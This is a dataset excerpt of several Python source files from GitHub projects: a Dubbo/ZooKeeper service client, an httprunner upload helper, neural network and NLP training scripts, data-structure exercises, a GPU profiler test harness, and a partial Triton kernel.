metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JokerChat/dubbo_fastapi",
"score": 2
} |
#### File: JokerChat/dubbo_fastapi/bm_dubbo.py
```python
import telnetlib
import json
import re
from kazoo.client import KazooClient
from urllib import parse
from config import ZK_CONFIG
class BmDubbo(object):
prompt = 'dubbo>'
def __init__(self, host, port):
self.conn = self.conn(host, port)
def conn(self,host, port):
conn = telnetlib.Telnet()
try:
#3秒后 连接超时
conn.open(host, port, timeout=3)
except BaseException:
return False
return conn
def command(self, str_=""):
# 模拟cmd控制台 dubbo>invoke ...
if self.conn :
self.conn.write(str_.encode() + b'\n')
data = self.conn.read_until(self.prompt.encode())
return data
else:
return False
def invoke(self, service_name, method_name, arg):
command_str = "invoke {0}.{1}({2})".format(service_name, method_name, arg)
data = self.command(command_str)
try:
# 字节数据解码 utf8
data = data.decode("utf-8").split('\n')[0].strip()
except BaseException:
# 字节数据解码 gbk
data = data.decode("gbk").split('\n')[0].strip()
return data
def ls_invoke(self, service_name):
command_str = "ls -l {0}".format(service_name)
data = self.command(command_str)
if "No such service" in data.decode("utf-8"):
return False
else:
data = data.decode("utf-8").split('\n')
key = ['methodName', 'paramType','type']
dubbo_list = []
for i in range(0, len(data) - 1):
value = []
dubbo_name = data[i].strip().split(' ')[1]
method_name = re.findall(r"(.*?)[(]", dubbo_name)[0]
value.append(method_name)
paramType = re.findall(r"[(](.*?)[)]", dubbo_name)[0]
paramTypeList = paramType.split(',')
if len(paramTypeList) ==1:
paramTypeList = paramTypeList[0]
value.append(paramTypeList)
if 'java.lang' in paramType or 'java.math' in paramType:
value.append(0)
elif not paramType:
value.append(1)
elif 'List' in paramType:
value.append(2)
else:
value.append(3)
dubbo_list.append(dict(zip(key, value)))
return dubbo_list
def param_data(self,service_name,method_name):
dubbo_data = self.ls_invoke(service_name)
if dubbo_data:
dubbo_list = dubbo_data
if dubbo_list:
for i in dubbo_list:
for v in i.values():
if v == method_name:
param_key = ['paramType','type']
param_value = [i.get('paramType'),i.get('type')]
return dict(zip(param_key,param_value))
else:
return False
else:
return False
class GetDubboService(object):
def __init__(self):
self.hosts = ZK_CONFIG
self.zk = self.zk_conn()
def zk_conn(self):
try:
zk = KazooClient(hosts=self.hosts, timeout=2)
zk.start(2) # 与zookeeper连接
except BaseException as e:
print(str(e))
return False
return zk
def get_dubbo_info(self, dubbo_service):
dubbo_service_data = {}
try:
#先查出注册中心所有的dubbo服务
all_node = self.zk.get_children('/dubbo')
#根据传入服务名匹配对应的服务
node = [i for i in all_node if dubbo_service in i]
# 查询dubbo服务的详细信息
#遍历数据,过滤掉空数据
for i in node:
if self.zk.get_children(f'/dubbo/{i}/providers'):
dubbo_data = self.zk.get_children(f'/dubbo/{i}/providers')
for index, a in enumerate(dubbo_data):
url = parse.urlparse(parse.unquote(a)).netloc
host, port = url.split(":")
conn = BmDubbo(host, port)
status = conn.command("")
if status:
data = dubbo_data[index]
break
self.zk.stop()
except BaseException as e:
return dubbo_service_data
#parse.unquote 解码
#parse.urlparse 解析URL
#parse.query 获取查询参数
#parse.parse_qsl 返回列表
url_data = parse.urlparse(parse.unquote(data))
query_data = dict(parse.parse_qsl(url_data.query))
query_data['methods'] = query_data['methods'].split(",")
dubbo_service_data['url'] = url_data.netloc
dubbo_service_data['dubbo_service'] = dubbo_service
dubbo_service_data.update(query_data)
return dubbo_service_data
if __name__ == '__main__':
conn1 = GetDubboService()
if conn1.zk:
data = conn1.get_dubbo_info('xxx')
print(json.dumps(data))
else:
print("连接zk服务异常")
```
#### File: JokerChat/dubbo_fastapi/ResponseNormal.py
```python
from fastapi import status
from fastapi.responses import JSONResponse, Response
from typing import Union
from fastapi.encoders import jsonable_encoder
#* 后面的参数被视为关键字参数。在函数调用时,关键字参数必须传入参数名
#-> Response 代表函数返回的是一个外部可访问的类的私有变量
def res_200(*, data: Union[list, dict, str,None]) -> Response:
content = {
'responseCode': 200,
'responseMsg': "请求成功",
'responseData': data,
}
return JSONResponse(
status_code=status.HTTP_200_OK,
content=jsonable_encoder(content)
)
def res_400(*, msg : str="系统异常")-> Response:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={
'responseCode': 400,
'responseMsg': msg
}
)
``` |
{
"source": "jokerdebug/httprunner",
"score": 3
} |
#### File: ext/uploader/__init__.py
```python
import os
import sys
from typing import Text, NoReturn
from httprunner.models import TStep, FunctionsMapping
from httprunner.parser import parse_variables_mapping
from loguru import logger
try:
import filetype
from requests_toolbelt import MultipartEncoder
UPLOAD_READY = True
except ModuleNotFoundError:
UPLOAD_READY = False
def ensure_upload_ready():
if UPLOAD_READY:
return
msg = """
uploader extension dependencies uninstalled, install first and try again.
install with pip:
$ pip install requests_toolbelt filetype
or you can install httprunner with optional upload dependencies:
$ pip install "httprunner[upload]"
"""
logger.error(msg)
sys.exit(1)
def prepare_upload_step(step: TStep, functions: FunctionsMapping) -> "NoReturn":
""" preprocess for upload test
replace `upload` info with MultipartEncoder
Args:
step: teststep
{
"variables": {},
"request": {
"url": "http://httpbin.org/upload",
"method": "POST",
"headers": {
"Cookie": "session=AAA-BBB-CCC"
},
"upload": {
"file": "data/file_to_upload"
"md5": "123"
}
}
}
functions: functions mapping
"""
if not step.request.upload:
return
ensure_upload_ready()
params_list = []
for key, value in step.request.upload.items():
step.variables[key] = value
params_list.append(f"{key}=${key}")
params_str = ", ".join(params_list)
step.variables["m_encoder"] = "${multipart_encoder(" + params_str + ")}"
# parse variables
step.variables = parse_variables_mapping(step.variables, functions)
step.request.headers["Content-Type"] = "${multipart_content_type($m_encoder)}"
step.request.data = "$m_encoder"
def multipart_encoder(**kwargs):
""" initialize MultipartEncoder with uploading fields.
Returns:
MultipartEncoder: initialized MultipartEncoder object
"""
def get_filetype(file_path):
file_type = filetype.guess(file_path)
if file_type:
return file_type.mime
else:
return "text/html"
ensure_upload_ready()
fields_dict = {}
for key, value in kwargs.items():
if isinstance(value, bool):
value = str(value).lower()
if os.path.isabs(value):
# value is absolute file path
_file_path = value
is_exists_file = os.path.isfile(value)
else:
# value is not absolute file path, check if it is relative file path
from httprunner.loader import load_project_meta
project_meta = load_project_meta("")
_file_path = os.path.join(project_meta.RootDir, value)
is_exists_file = os.path.isfile(_file_path)
if is_exists_file:
# value is file path to upload
filename = os.path.basename(_file_path)
mime_type = get_filetype(_file_path)
# TODO: fix ResourceWarning for unclosed file
file_handler = open(_file_path, "rb")
fields_dict[key] = (filename, file_handler, mime_type)
else:
fields_dict[key] = value
return MultipartEncoder(fields=fields_dict)
def multipart_content_type(m_encoder) -> Text:
""" prepare Content-Type for request headers
Args:
m_encoder: MultipartEncoder object
Returns:
content type
"""
ensure_upload_ready()
return m_encoder.content_type
``` |
{
"source": "JoKerDii/BsplineLayer",
"score": 3
} |
#### File: JoKerDii/BsplineLayer/test_af.py
```python
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
from PIL import Image
from torch import optim
from torch.utils.data import Dataset
from torchvision import transforms
from BSplineActivation import BSplineActivation
class FashionMNIST(Dataset):
"""
Dataset from Kaggle competition
"""
def __init__(self):
self.transform = transforms.Compose([transforms.ToTensor()])
fashion_df = pd.read_csv(
'/home/zhendi/wei/splines-nn/fashion-mnist_train.csv')
self.labels = fashion_df.label.values
self.images = fashion_df.iloc[:, 1:].values.astype(
'uint8').reshape(-1, 28, 28)
def __len__(self):
return len(self.images)
def __getitem__(self, idx):
label = self.labels[idx]
img = Image.fromarray(self.images[idx])
if self.transform:
img = self.transform(img)
return img, label
def train_mlp_model(model, config):
"""
Function trains the model and prints out the training loss.
"""
criterion = nn.NLLLoss().to(config.device)
learning_rate = 0.003
epochs = 5
optimizer = optim.Adam(model.parameters(), lr=learning_rate)
for e in range(epochs):
running_loss = 0
for images, labels in trainloader:
images = images.view(images.shape[0], -1).to(config.device)
labels = labels.to(config.device)
log_ps = model(images)
loss = criterion(log_ps, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
else:
print(f"Training loss: {running_loss}")
def train_cnn_model(model, config):
'''
Function trains the model and prints out the training loss.
'''
criterion = nn.NLLLoss().to(config.device)
learning_rate = 0.003
epochs = 5
optimizer = optim.Adam(model.parameters(), lr=learning_rate)
for e in range(epochs):
running_loss = 0
for images, labels in trainloader:
# images = images.view(images.shape[0], -1)
images = images.to(config.device)
labels = labels.to(config.device)
log_ps = model(images)
loss = criterion(log_ps, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
else:
print(f"Training loss: {running_loss}")
class MLP(nn.Module):
'''
Simple fully-connected classifier model to demonstrate activation.
'''
def __init__(self, config):
super(MLP, self).__init__()
self.fc1 = nn.Linear(784, 256) # (N, 28 * 28) -> (N, 256)
self.fc2 = nn.Linear(256, 128) # -> (N, 128)
self.fc3 = nn.Linear(128, 64) # -> (N, 64)
self.fc4 = nn.Linear(64, 10) # -> (N, 10)
self.a1 = BSplineActivation(num_activations=256,
mode='linear', device=config.device)
self.a2 = BSplineActivation(num_activations=128,
mode='linear', device=config.device)
self.a3 = BSplineActivation(num_activations=64,
mode='linear', device=config.device)
def forward(self, x):
x = x.view(x.shape[0], -1)
x = self.a1(self.fc1(x))
x = self.a2(self.fc2(x))
x = self.a3(self.fc3(x))
x = F.log_softmax(self.fc4(x), dim=1)
return x
class CNN(nn.Module):
'''
Simple fully-connected classifier model to demonstrate activation.
'''
def __init__(self, config):
super(CNN, self).__init__()
self.c1 = 6
self.conv1 = nn.Conv2d(1, self.c1, 5)
self.pool = nn.MaxPool2d(2, 2)
self.fc1 = nn.Linear(self.c1 * 12 * 12, 512) # 864
self.fc2 = nn.Linear(512, 128)
self.fc3 = nn.Linear(128, 64)
self.fc4 = nn.Linear(64, 10)
self.a1 = BSplineActivation(
num_activations=self.c1, device=config.device)
self.a2 = torch.nn.ReLU()
def forward(self, x):
x = self.conv1(x)
x = self.a1(x)
x = self.pool(x)
x = x.view(-1, self.c1 * 12 * 12)
x = self.a2(self.fc1(x))
x = self.a2(self.fc2(x))
x = self.a2(self.fc3(x))
x = F.log_softmax(self.fc4(x), dim=1)
return x
class Config(object):
"""parameters"""
def __init__(self):
self.device = 'cuda:3'
# self.device = 'cpu'
if __name__ == "__main__":
config = Config()
print(config.device)
trainset = FashionMNIST()
trainloader = torch.utils.data.DataLoader(
trainset, batch_size=64, shuffle=True)
# train CNN
model = CNN(config).to(config.device)
train_cnn_model(model, config)
# train MLP
# model = MLP(config).to(config.device)
# train_linear_model(model, config)
``` |
{
"source": "JoKerDii/Personalized-Medicine",
"score": 3
} |
#### File: Personalized-Medicine/word-embedding-and-bow/biosentvec-rf.py
```python
import os
import re
import warnings
import numpy as np
import pandas as pd
import sent2vec
import spacy
from keras.utils import np_utils
from nltk import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from nltk.tokenize import RegexpTokenizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import balanced_accuracy_score, f1_score, log_loss
from sklearn.model_selection import StratifiedKFold, cross_val_predict, train_test_split
from sklearn.preprocessing import LabelEncoder
from spacy.lang.en.stop_words import STOP_WORDS
warnings.filterwarnings("ignore")
### Import Data
for dirname, _, filenames in os.walk("/home/zhendi/pm/data/dataset"):
for filename in filenames:
print(os.path.join(dirname, filename))
data = pd.read_csv(
"/home/zhendi/pm/data/dataset/training_variants.zip", encoding="ISO-8859–1"
)
print("Number of data points : ", data.shape[0])
print("Number of features : ", data.shape[1])
print("Features : ", data.columns.values)
data_text = pd.read_csv(
"/home/zhendi/pm/data/dataset/training_text.zip",
sep="\|\|",
engine="python",
names=["ID", "TEXT"],
skiprows=1,
encoding="ISO-8859–1",
)
print("Number of data points : ", data_text.shape[0])
print("Number of features : ", data_text.shape[1])
print("Features : ", data_text.columns.values)
### Data Preprocessing
tokenizer = RegexpTokenizer(r"\w+'?\w+|\w+")
stop_words = stopwords.words("english")
exceptionStopWords = {
"again",
"against",
"ain",
"almost",
"among",
"amongst",
"amount",
"anyhow",
"anyway",
"aren",
"aren't",
"below",
"bottom",
"but",
"cannot",
"couldn",
"couldn't",
"didn",
"didn't",
"doesn",
"doesn't",
"don",
"don't",
"done",
"down",
"except",
"few",
"hadn",
"hadn't",
"hasn",
"hasn't",
"haven",
"haven't",
"however",
"isn",
"isn't",
"least",
"mightn",
"mightn't",
"move",
"much",
"must",
"mustn",
"mustn't",
"needn",
"needn't",
"neither",
"never",
"nevertheless",
"no",
"nobody",
"none",
"noone",
"nor",
"not",
"nothing",
"should",
"should've",
"shouldn",
"shouldn't",
"too",
"top",
"up",
"very" "wasn",
"wasn't",
"well",
"weren",
"weren't",
"won",
"won't",
"wouldn",
"wouldn't",
}
stop_words = set(stop_words).union(STOP_WORDS)
final_stop_words = stop_words - exceptionStopWords
nlp = spacy.load("en", disable=["parser", "tagger", "ner"])
def make_token(x):
""" Tokenize the text (remove punctuations and spaces)"""
return tokenizer.tokenize(str(x))
def remove_stopwords(x):
return [token for token in x if token not in final_stop_words]
def lemmatization(x):
lemma_result = []
for words in x:
doc = nlp(words)
for token in doc:
lemma_result.append(token.lemma_)
return lemma_result
puncts = [
",",
".",
'"',
":",
")",
"(",
"-",
"!",
"?",
"|",
";",
"'",
"$",
"&",
"/",
"[",
"]",
">",
"%",
"=",
"#",
"*",
"+",
"\\",
"•",
"~",
"@",
"£",
"·",
"_",
"{",
"}",
"©",
"^",
"®",
"`",
"<",
"→",
"°",
"€",
"™",
"›",
"♥",
"←",
"×",
"§",
"″",
"′",
"Â",
"█",
"½",
"à",
"…",
"“",
"★",
"”",
"–",
"●",
"â",
"►",
"−",
"¢",
"²",
"¬",
"░",
"¶",
"↑",
"±",
"¿",
"▾",
"═",
"¦",
"║",
"―",
"¥",
"▓",
"—",
"‹",
"─",
"▒",
":",
"¼",
"⊕",
"▼",
"▪",
"†",
"■",
"’",
"▀",
"¨",
"▄",
"♫",
"☆",
"é",
"¯",
"♦",
"¤",
"▲",
"è",
"¸",
"¾",
"Ã",
"⋅",
"‘",
"∞",
"∙",
")",
"↓",
"、",
"│",
"(",
"»",
",",
"♪",
"╩",
"╚",
"³",
"・",
"╦",
"╣",
"╔",
"╗",
"▬",
"❤",
"ï",
"Ø",
"¹",
"≤",
"‡",
"√",
]
def clean_text(x):
x = str(x)
for punct in puncts:
if punct in x:
x = x.replace(punct, "")
return x
def pipeline(total_text, index, column):
"""A pipeline to process text data for BioSentVec"""
if type(total_text) is str:
all_text = []
# sentence tokenizer and case lower
for sent in sent_tokenize(total_text):
text = " ".join(word_tokenize(sent))
all_text.append(text.lower())
all_sents = []
for sent in all_text:
# clean punctuations
sent = clean_text(sent)
# print(type(sent))
sent = word_tokenize(sent)
sent = remove_stopwords(sent)
sent = lemmatization(sent)
string = " ".join(sent)
# clean numbers
sent_nonum = re.sub(r"\b\d+\b", "", string)
string = " ".join(sent_nonum.split())
all_sents.append(string)
data_text["TEXT"][index] = all_sents
for index, row in data_text.iterrows():
if type(row["TEXT"]) is str:
pipeline(row["TEXT"], index, "TEXT")
else:
print("there is no text description for id:", index)
### Merge genes, variations and text data by ID
result = pd.merge(data, data_text, on="ID", how="left")
result.loc[result["TEXT"].isnull(), "TEXT"] = result["Gene"] + " " + result["Variation"]
result.Gene = result.Gene.str.replace("\s+", "_")
result.Variation = result.Variation.str.replace("\s+", "_")
labels = result[["Class"]] - 1
# save result
# pd.to_pickle(result, "/home/zhendi/pm/scripts/result_sentVec_strict.pkl")
# load result
# result = pd.read_pickle("/home/zhendi/pm/scripts/result_sentVec_strict.pkl")
# Define the model
import sent2vec
model_path = "/data/zhendi/nlp/BioSentVec_PubMed_MIMICIII-bigram_d700.bin"
model = sent2vec.Sent2vecModel()
try:
model.load_model(model_path)
except Exception as e:
print(e)
print("model successfully loaded")
def BioSentVec_transform(model, data):
# determine the dimensionality of vectors
V = model.embed_sentence("once upon a time .")
D = V.shape[1]
print("D = V.shape[1]: ", D)
X = np.zeros((len(data), D))
emptycount = 0
n = 0
for record in data:
try:
vec = model.embed_sentences(record)
except KeyError:
print("there is a sent with no match.")
pass
if len(vec) > 0:
X[n] = vec.mean(axis=0)
else:
emptycount += 1
n += 1
print("Number of samples with no words found: %s / %s" % (emptycount, len(data)))
return X
def build_onehot_Features(df):
"""This is a function to extract features, df argument should be
a pandas dataframe with only Gene, Variation, and TEXT columns"""
# make a copy
temp = df.copy()
# onehot encode gene and variation
print("Onehot Encoding...")
temp = pd.get_dummies(temp, columns=["Gene", "Variation"], drop_first=True)
# Sent2Vec vectorize TEXT
print("Sent2Vec Vectorizing...")
temp_sent2v = BioSentVec_transform(temp["TEXT"])
del temp["TEXT"]
# rename the colnames
tempc = list(temp.columns)
for i in range(np.shape(temp_sent2v)[1]):
tempc.append("sent2v_" + str(i + 1))
temp = pd.concat([temp, pd.DataFrame(temp_sent2v, index=temp.index)], axis=1)
temp.columns = tempc
return temp
trainDf = build_onehot_Features(result[["Gene", "Variation", "TEXT"]])
# save
# pd.to_pickle(trainDf, "/home/zhendi/pm/scripts/Onehot_biosentvec_trainDf_strict.pkl")
# laod
# trainDf = pd.read_pickle("/home/zhendi/pm/scripts/Onehot_biosentvec_trainDf_strict.pkl")
### Split data into training data and testing data
X_train, X_test, y_train, y_test = train_test_split(
trainDf, labels, test_size=0.2, random_state=5, stratify=labels
)
print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
le = LabelEncoder()
y_train = le.fit_transform(y_train)
y_test = le.transform(y_test)
encoded_test_y = np_utils.to_categorical((le.inverse_transform(y_test)))
def evaluate_features(X, y, clf=None):
if clf is None:
clf = RandomForestClassifier(n_estimators=400, random_state=5)
probas = cross_val_predict(
clf,
X,
y,
cv=StratifiedKFold(n_splits=3),
n_jobs=-1,
method="predict_proba",
verbose=2,
)
pred_indices = np.argmax(probas, axis=1)
classes = np.unique(y)
preds = classes[pred_indices]
print("Log loss: {}".format(log_loss(y, probas)))
print("Accuracy: {}".format(balanced_accuracy_score(y, preds)))
print("F1 score: {}".format(f1_score(y, preds, average="micro")))
evaluate_features(X_train, y_train)
``` |
{
"source": "JokerDLord/GISDataStructure",
"score": 4
} |
#### File: JokerDLord/GISDataStructure/BSTree.py
```python
class BSNode():
def __init__(self,k,left_=None,right_=None):
self.key=k
self.left=left_
self.right=right_
class BSTree:
def __init__(self):
self.root = None
#查找
def search(self,k):
if self.root is None:
return None
pn=self.root
while pn is not None:#不为空时继续
if k>pn.key:#右子树下行
pn=pn.right
elif k<pn.key:#左子树下行
pn=pn.left
elif k==pn.key:#找到
return print("{} is found".format(pn.key))
return print("{} is not found".format(k))
#插入
def insert(self,k):
if self.root is None:#空树插入根节点
self.root=BSNode(k)
return None
else:
pn1=self.root
while pn1 is not None:
pn2=pn1
if k>pn1.key:#比当前关键值大 沿着右子树下行
pn1=pn1.right
flg=1
elif k<pn1.key:#比当前关键值小 沿着左子树下行
pn1=pn1.left
flg=2
elif k==pn1.key:#节点已经存在
return None
pn1 = BSNode(k)
if flg == 1:#右子树插入
pn2.right=pn1
elif flg == 2:#左子树插入
pn2.left=pn1
#删除元素
def delete(self,k):
if self.root is None:
return False
else:
pn1=self.root#设为根节点
flg = 0
while pn1 is not None:#当pn1不为None时循环 直到pn1为pn2叶节点的左/右空节点
if k>pn1.key:#向右子树下行 flg为1
pn2=pn1
pn1=pn1.right
flg=1
elif k<pn1.key:#向左子树下行 flg为2
pn2=pn1
pn1=pn1.left
flg=2
elif k==pn1.key:#找到k值 跳出循环 pn1为k对应节点
break
if pn1 is None:
return False
elif flg==1:
#pn1==pn2.right
if (pn1.left is None) &(pn1.right is None):#无左右节点 直接删除叶节点
pn2.right=None
elif (pn1.left is None):#左节点为空则将右节点上接
pn2.right=pn1.right
elif (pn1.right is None):#右节点为空则将左节点上接
pn2.right=pn1.left
else: #左右子树均不为空的节点
bn2=pn1.left#当前节点的左子树bn2
while (bn2 is not None):#左子树的右路径到底
p2=bn2#p2为当前bn2的父节点
bn2=bn2.right#右子树下行
p2.right = pn1.right#将左子树的最大节点链接pn1的右节点
pn2.right=pn1.left#pn1左节点代替pn1
elif flg==2:
#pn1==pn2.left
if (pn1.left is None)&(pn1.right is None):#直接删除叶节点
pn2.right=None
elif (pn1.left is None):#左节点为空则将右节点上接
pn2.left=pn1.right
elif (pn1.right is None):#右节点为空则将左节点上接
pn2.left=pn1.left
else:#删除左右子树均不为空的根节点
bn2=pn1.left
while (bn2 is not None):
p2=bn2
bn2=bn2.right
p2.right=pn1.right#将左子树的最大节点链接pn1的右节点
pn2.left=pn1.left#pn1左节点代替pn1
elif flg==0:#删除的是根节点
if (self.root.right is None) & (self.root.left is None):
self.root=None
elif self.root.left is None:
self.root=self.root.right
elif self.root.right is None:
self.root=self.root.left
else:
bn3=self.root.left
while (bn3 is not None):
bn4=bn3
bn3=bn3.right
bn4.right=pn1.right#根节点的左子树最右节点链接根节点右节点
self.root=self.root.left#左节点设置为根节点
#通过递归定义二叉树的先序遍历
def preorder(self,t):
if t is None:
return
print(repr(t.key),end=" ")
self.preorder(t.left)
self.preorder(t.right)
#通过递归定义二叉树的中序遍历 中序遍历会将排序树按照从小到大输出
def midorder(self,t):
if t is None:
return
self.midorder(t.left)
print(repr(t.key),end=" ")
self.midorder(t.right)
if __name__ == "__main__":
bst=BSTree()
lnum=[63,90,70,55,67,42,98,83,10,45,58]
for num in lnum:
bst.insert(num)
print("bst先序/中序遍历:")
bst.preorder(bst.root)
print()
bst.midorder(bst.root)
print()
bst.search(10)
print('删除63并先序/中序遍历:')
bst.delete(65)
bst.preorder(bst.root)
print()
bst.midorder(bst.root)
print()
bst.search(65)
```
#### File: JokerDLord/GISDataStructure/SeqList.py
```python
class SeqList(list): #创建顺序表类
def __init__(self,lst = []):
self._array = lst
self._length = len(self._array)
def get(self,idx):
if idx>self._length or idx<0:
return print("index out of range")
return self._array[idx]
def find(self,key):
#查找值为key的元素的位置
for i in range(len(self._array)):
if self._array[i] == key:
return i
return None
def insert(self,idx,elem):
k=len(self._array)-1
self._array.append(0)
if (idx>k+1) or (idx<0):
return False
while k>=idx:
self._array[k+1]=self._array[k]
k-=1
self._array[idx]=elem
return True
def delete(self,idx):
if idx>self._length or idx<0:
return print("index out of range")
for i in range(idx,self._length):
self._array[i] = self._array[i+1]
del self._array[-1]
self._length-=1
return self._array
def length(self):
return len(self._array)
def __repr__(self): #直接打印顺序表以list的形式
return "{}".format(self._array)
def traverse(self):#遍历并打印顺序表
s=""
for i in self._array:
s=s+str(i)+" "
return s
if __name__=="__main__":
slst=[1,2,6,9]
slst = SeqList(slst) #创建顺序表slst
print(slst.find(2)) #找到2所在的下标
print(slst.insert(2,4)) #在索引2前插入4
print(slst) #打印顺序表
print(slst.length()) #输出顺序表长度
print(slst.delete(2))#删除顺序表第二位的元素
print(slst.traverse()) #遍历打印顺序表
#把第二题的gdp数据导入一个顺序表中
with open("gdp.txt","r") as f:
gdps = SeqList()
count = 0
for row in f:
year,GDP = row.split(",")
gdps.insert(count,float(GDP))
count+=1
print(gdps) #打印顺序表
``` |
{
"source": "Jokerella/discord.py-altyapi-bot",
"score": 2
} |
#### File: discord.py-altyapi-bot/cogs/Deneme.py
```python
from discord.ext import commands
import discord
from random import seçenek
class emirhan(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message):
try:
print(str(message.author)+": "+str(message.content))
except Exception:
print(str(message.author)+":")
if "sa" in message.clean_content.lower():
await message.channel.send(seçenek(["AL<NAME>", "as", "as kardeşim"]))
def setup(bot):
bot.add_cog(emirhan(bot))
``` |
{
"source": "Jokeren/hpctoolkit-cuda-memory-patch",
"score": 2
} |
#### File: hpctoolkit-cuda-memory-patch/python/test_cases.py
```python
from collections import namedtuple
import os
from utils import cleanup
class Test(object):
Case = namedtuple('Case', ['path', 'versions',
'command', 'options', 'cleanup'])
cases = dict()
# unit test cases
cases['vectorAdd.f128'] = Case(
path='samples/vectorAdd.f128', versions=[], command='./vectorAdd', options=[], cleanup=True)
cases['op_graph_simple'] = Case(
path='samples/op_graph_simple', versions=[], command='./main', options=[], cleanup=True)
cases['op_pattern_simple'] = Case(
path='samples/op_pattern_simple', versions=[], command='./main', options=[], cleanup=True)
cases['stress'] = Case(path='samples/stress', versions=[],
command='./stress', options=[], cleanup=True)
# sample test cases
cases['bfs'] = Case(path='samples/bfs', command='./bfs', versions=['vp-opt1',
'vp-opt2', 'vp-opt'], options=['../data/graph1MW_6.txt'], cleanup=True)
cases['backprop'] = Case(path='samples/backprop', command='./backprop', versions=[
'vp-opt1', 'vp-opt2', 'vp-opt'], options=['65536'], cleanup=True)
cases['cfd'] = Case(path='samples/cfd', command='./euler3d', versions=['vp-opt1',
'vp-opt2', 'vp-opt'], options=['../data/fvcorr.domn.097K'], cleanup=True)
cases['hotspot'] = Case(path='samples/hotspot', command='./hotspot', versions=['vp-opt'], options=[
'512', '2', '2', '../data/temp_512', '../data/power_512', 'output.out'], cleanup=True)
cases['hotspot3D'] = Case(path='samples/hotspot3D', command='./3D', versions=['vp-opt'], options=[
'512', '8', '100', '../data/power_512x8', '../data/temp_512x8', 'output.out'], cleanup=True)
cases['huffman'] = Case(path='samples/huffman', command='./pavle', versions=[
'vp-opt'], options=['../data/test1024_H2.206587175259.in'], cleanup=True)
cases['lavaMD'] = Case(path='samples/lavaMD', command='./lavaMD',
versions=['vp-opt'], options=['-boxes1d', '10'], cleanup=True)
cases['particlefilter'] = Case(path='samples/particlefilter', command='./particlefilter_float', versions=[
'vp-opt'], options=['-x', '128', '-y', '128', '-z', '10', '-np', '1000'], cleanup=True)
cases['pathfinder'] = Case(path='samples/pathfinder', command='./pathfinder',
versions=['vp-opt'], options=['100000', '100', '20'], cleanup=True)
cases['srad'] = Case(path='samples/srad_v1', command='./srad', versions=['vp-opt1',
'vp-opt2', 'vp-opt'], options=['10', '0.5', '502', '458'], cleanup=True)
cases['streamcluster'] = Case(path='samples/streamcluster', command='./sc_gpu', versions=['vp-opt'], options=[
'10', '20', '256', '65536', '65536', '1000', 'none', 'output.txt', '1'], cleanup=True)
# application cases
cases['barracuda'] = Case(path='samples/barracuda', command='./barracuda', versions=['vp-opt'],
options=['aln', 'sample_data/Saccharomyces_cerevisiae.SGD1.01.50.dna_rm.toplevel.fa',
'sample_data/sample_reads.fastq', '>', 'quicktest.sai'], cleanup=False)
cases['castro'] = Case(path='samples/Castro/Exec/hydro_tests/Sedov', command='Castro2d.gnu.CUDA.ex', versions=['vp-opt'],
options=['./inputs.2d.cyl_in_cartcoords'], cleanup=False)
cases['darknet'] = Case(path='samples/darknet', command='./darknet', versions=['vp-opt'],
options=['detector', 'test', './cfg/coco.data', './cfg/yolov4.cfg',
'./yolov4.weights', 'data/dog.jpg', '-i', '0', '-thresh', '0.25'], cleanup=False)
cases['deepwave'] = Case(path='samples/deepwave', command='./Deepwave_SEAM_example1.py', versions=['vp-opt'],
options=[], cleanup=False)
cases['namd'] = Case(path='samples/NAMD/Linux-x86_64-g++', command='./namd3',
versions=['vp-opt'], options=['../alain'], cleanup=False)
cases['qmcpack'] = Case(path='samples/qmcpack/workspace/NiO/dmc-a4-e48-batched_driver-DU8',
command='../../../build/bin/qmcpack', versions=['vp-opt'], options=['./NiO-fcc-S1-dmc.xml'], cleanup=False)
def __init__(self, name, arch, version=None):
self._name = name
self._arch = arch
self._version = version
self._configs = dict()
def name(self):
return self._name
def setup(self, choices):
pass
def _run_impl(self, case_name, version):
pass
def run(self, iterations=1):
cwd = os.getcwd()
for i in range(iterations):
for case_name, case in Test.cases.items():
if case_name not in self._configs:
continue
os.chdir(case.path)
if i == 0 and case.cleanup:
cleanup(self._arch)
self._run_impl(case_name, None)
os.chdir(cwd)
if self._version is None:
continue
for version in case.versions:
if version == self._version or self._version == 'all':
os.chdir(case.path + '-' + version)
if i == 0 and case.cleanup:
cleanup(self._arch)
self._run_impl(case_name, version)
os.chdir(cwd)
``` |
{
"source": "Jokeren/RzLinear",
"score": 2
} |
#### File: rz_linear/impl/RzLinearIdx.py
```python
import torch
import triton
import triton.language as tl
def rz_linear_idx_tl(hashed_weight: torch.tensor,
K: int, N: int, H: int,
R3: int, R2: int, R1: int, R0: int,
BLOCK_SIZE_K: int = 32, BLOCK_SIZE_N: int = 32) -> torch.tensor:
'''
Reconstruct the original weight tensor using the hashed weight
Args:
hashed_weight (Tensor): (1xH) The compressed weight tensor
M, K, N, H (int): Matrix dimensions
R3, R2, R1, R0 (int): Random numbers
BLOCK_SIZE_K, BLOCK_SIZE_N (int): Workload of each GPU block
Returns:
output (Tensor): A KxN tensor
'''
# TODO(Keren): make rzlinear more general for any shape
assert (H > (BLOCK_SIZE_K * BLOCK_SIZE_N))
assert (K % BLOCK_SIZE_K == 0)
assert (N % BLOCK_SIZE_N == 0)
# allocates output
weight = torch.empty((K, N), device=hashed_weight.device,
dtype=hashed_weight.dtype)
def grid(META): return (
triton.cdiv(K, META['BLOCK_SIZE_K']) *
triton.cdiv(N, META['BLOCK_SIZE_N']),
)
rz_linear_idx_kernel[grid](
hashed_weight, weight,
K, N, H,
R3, R2, R1, R0,
weight.stride(0), weight.stride(1),
num_warps=4,
BLOCK_SIZE_N=BLOCK_SIZE_N,
BLOCK_SIZE_K=BLOCK_SIZE_K
)
return weight
@triton.jit
def rz_linear_idx_kernel(
bh_ptr, b_ptr,
# Matrix dimensions
K, N, H,
# Random numbers
R3, R2, R1, R0,
# The stride variables represent how much to increase the ptr by when moving by 1
# element in a particular dimension. E.g. stride_am is how much to increase a_ptr
# by to get the element one row down (A has M rows)
stride_bk, stride_bn,
# Meta-parameters
BLOCK_SIZE_N: tl.constexpr, BLOCK_SIZE_K: tl.constexpr
):
pid = tl.program_id(axis=0)
